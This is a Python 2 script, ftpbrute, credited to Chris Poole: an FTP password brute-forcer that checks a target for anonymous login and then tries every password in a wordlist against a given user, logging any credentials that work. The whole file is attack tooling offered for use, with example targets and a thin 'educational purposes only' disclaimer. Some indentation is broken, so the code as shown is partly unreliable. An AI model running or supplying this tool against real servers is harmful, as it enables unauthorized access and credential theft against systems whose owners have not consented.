ftpbrute

1. #!/usr/bin/python
2. # -*- coding: utf-8 -*-
3. ############################################################
4. #    ______ _______ _____        ____             _        #
5. #   |  ____|__   __|  __ \      |  _ \           | |       #
6. #   | |__     | |  | |__) |_____| |_) |_ __ _   _| |_ ___  #
7. #   |  __|    | |  |  ___/______|  _  | |__| | | | __/ _ \ #
8. #   | |       | |  | |          | |_) | |  | |_| | ||  __/ #
9. #   |_|       |_|  |_|          |____/|_|   \__,_|\__\___| #
10. #                                                          #
11. ############################################################
12. #This program was made for educational purposes only, using
13. #for malicious use is strictly forbidden, I'm not responsible
14. #for any misuse of this program, Copy rights pend to Chris Poole.
15. ################################################################
16. #     _____              _ _ _                  __             #
17. #    / ____|            | (_) |              _  \ \            #
18. #   | |     _ __ ___  __| |_| |_ ___        (_)  | |           #
19. #   | |    | '__/ _ \/ _` | | __/ __|            | |           #
20. #   | |____| | |  __/ (_| | | |_\__ \        _   | |           #
21. #    \_____|_|  \___|\__,_|_|\__|___/       (_)  | |           #
22. #                                               /_/            #
23. #                                                              #
24. ################################################################
25. #       http://twitter.com/codingplanets  // Chris Poole       #
26. ################################################################
27. import sys
28. import time
29. import os
30. from ftplib import FTP
31.  
32. if sys.platform == 'linux-i386' or sys.platform == 'linux2' or sys.platform == 'darwin':
33.     SysCls = 'clear'
34. elif sys.platform == 'win32' or sys.platform == 'dos' or sys.platform[0:5] == 'ms-dos':
35.     SysCls = 'cls'
36. else:
37.     SysCls = 'unknown'
38.  
39. log = "ftpbrute.log"
40. face =  '''
41.  ______ _______ _____         ____             _      
42. |  ____|__   __|  __ \      |  _ \          | |      
43. | |__     | |  | |__) | ____ | |_) |_ __ _   _| |_ ___
44. |  __|    | |  |  ___/  ____ |  _  | |__| | | | __/ _ \
45. | |       | |  | |           | |_) | |  | |_| | ||  __/
46. |_|       |_|  |_|           |____/|_|   \__,_|\__\___|
47.                                                      
48.                                                      
49.          FTP = File Transfer Protocol
50.          Bruteforcing = Retriving login access with a passwordlist
51. ___________________________________________________________________
52. '''
53.  
54. option = '''
55. Usage: python ftpbrute.py [options]
56. Options: -t,     <hostname/ip>   |   Target to bruteforcing
57.         -u,       <user>          |   User for bruteforcing
58.         -w,   <filename>      |   Passwords used for bruteforcing
59.         -h,       <help>          |   print this help
60.                                                            
61. Example: python ftpbrute.py -t 192.168.1.1 -u root -w passwords.txt
62. Example: python ftpbrute.py -t binarysec.org -u root -w list.txt
63. ___________________________________________________________________
64. '''
65.  
66. file = open(log, "a")
67.  
68. def MyFace() :
69.     os.system(SysCls)
70.     print face
71.     file.write(face)
72.  
73.     print option
74.  
75. def HelpMe() :
76.     MyFace()
77.     file.write(option)
78.     sys.exit(1)
79.  
80. for arg in sys.argv:
81.     if arg.lower() == '-t' or arg.lower() == '--target':
82.             hostname = sys.argv[int(sys.argv[1:].index(arg))+2]
83.     elif arg.lower() == '-u' or arg.lower() == '--user':
84.             user = sys.argv[int(sys.argv[1:].index(arg))+2]
85.     elif arg.lower() == '-w' or arg.lower() == '--wordlist':
86.             wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
87.     elif arg.lower() == '-h' or arg.lower() == '--help':
88.             HelpMe()
89.     elif len(sys.argv) <= 1:
90.         HelpMe()
91.        
92. def checkanony() :
93.     try:
94.         print "\n[+] Checking for anonymous login\n"
95.         ftp = FTP(hostname)
96.         ftp.login()
97.         ftp.retrlines('LIST')
98.         print "\n[!] Anonymous login successfuly !\n"
99.         ftp.quit()
100.     except Exception, e:
101.             print "\n[-] Anonymous login unsuccessful...\n"
102.         pass
103.        
104.  
105. def BruteForce(word) :
106.     sys.stdout.write ("\r[?]Trying : %s " % (word))
107.     sys.stdout.flush()
108.     file.write("\n[?]Trying :"+word)
109.         try:
110.         ftp = FTP(hostname)
111.         ftp.login(user, word)
112.         ftp.retrlines('list')
113.         ftp.quit()
114.         print "\n\t[!] Login Success ! "
115.         print "\t[!] Username : ",user, ""
116.         print "\t[!] Password : ",word, ""
117.         print "\t[!] Hostname : ",hostname, ""
118.         print "\n\tThank you for using my FTP bruteforcer! :)"
119.         print "\n\tCredits | @codingplanets | Chris Poole"
120.         print "\n\t                    "
121.         print "\t[!] Log all has been saved to",log,"\n"
122.         file.write("\n\n\t[!] Login Success ! ")
123.         file.write("\n\t[!] Username : "+user )
124.         file.write("\n\t[!] Password : "+word )
125.         file.write("\n\t[!] Hostname : "+hostname)
126.         file.write("\n\t[!] Log all has been saved to "+log)
127.         file.write("\n\n\tThank you for using my FTP bruteforcer! :)")
128.         file.write("\n\n\tCredits | @codingplanets | Chris Poole")
129.         file.write("\n\n\t                    ")
130.  
131.  
132.  
133.         sys.exit(1)
134.     except Exception, e:
135.             #print "[-] Failed"
136.         pass
137.     except KeyboardInterrupt:
138.         print "\n[-] Aborting...\n"
139.         file.write("\n[-] Aborting...\n")
140.         sys.exit(1)
141.    
142. MyFace()
143. print "[!] Starting attack at %s" % time.strftime("%X")
144. print "[!] System Activated for brute forcing..."
145. print "[!] Please wait until brute forcing finish !\n"
146. file.write("\n[!] Starting attack at %s" % time.strftime("%X"))
147. file.write("\n[!] System Activated for brute forcing...")
148. file.write("\n[!] Please wait until brute forcing finish !\n")
149. checkanony()   
150.  
151. try:
152.     preventstrokes = open(wordlist, "r")
153.     words          = preventstrokes.readlines()
154.     count          = 0
155.     while count < len(words):
156.         words[count] = words[count].strip()
157.         count += 1
158. except(IOError):
159.     print "\n[-] Error: Check your wordlist path\n"
160.     file.write("\n[-] Error: Check your wordlist path\n")
161.     sys.exit(1)
162.  
163. print "\n[+] Loaded:",len(words),"words"
164. print "[+] Server :",hostname
165. print "[+] User :",user
166. print "[+] BruteForcing...\n"
167.  
168. for word in words:
169.     BruteForce(word.replace("\n",""))
170.  
171. file.close()